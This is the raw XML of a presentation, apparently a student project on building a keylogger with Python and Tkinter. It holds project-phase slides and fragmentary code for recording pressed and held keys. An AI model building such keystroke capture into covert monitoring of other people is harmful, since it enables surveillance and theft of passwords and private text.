          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Design: Develop the keylogger's functionalities, user interface, and data handling mechanisms.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implementation: Code the keylogger using Python and Tkinter, and conduct rigorous testing.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Deployment: Create installation packages, configure settings, and provide comprehensive </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>documentation.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Maintenance: Monitor performance, provide updates, offer user support, and ensure adherence </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>to ethical standards and regulations.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>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rmAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380880" y="477000"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767600" y="2813760"/>
            <a:ext cx="8087400" cy="152388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rmAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218520" y="-431280"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Create GUI</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1745280"/>
            <a:ext cx="10954800" cy="466740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rmAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296640" y="-426960"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535560" y="1640880"/>
            <a:ext cx="5608080" cy="55760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IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t># Initialize the variables</a:t>
            </a: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keys_used = []</a:t>
            </a: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flag = False</a:t>
            </a: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keys = ""</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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 Define the on_press function</a:t>
            </a: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def on_press(key):</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>global flag, keys_used, keys</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>if flag == False:</a:t>
            </a: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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>keys_used.append(</a:t>
            </a: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            </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>{'Pressed': f'{key}'}</a:t>
            </a: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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>)</a:t>
            </a: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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>flag = True</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>if flag == True:</a:t>
            </a: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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>keys_used.append(</a:t>
            </a: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            </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>{'Held': f'{key}'}</a:t>
            </a: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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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rmAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296640" y="-426960"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535560" y="1640880"/>
            <a:ext cx="5608080" cy="50274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IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t># Define the on_release function</a:t>
            </a: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def on_release(key):</a:t>
            </a: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    </a:t>
            </a:r>
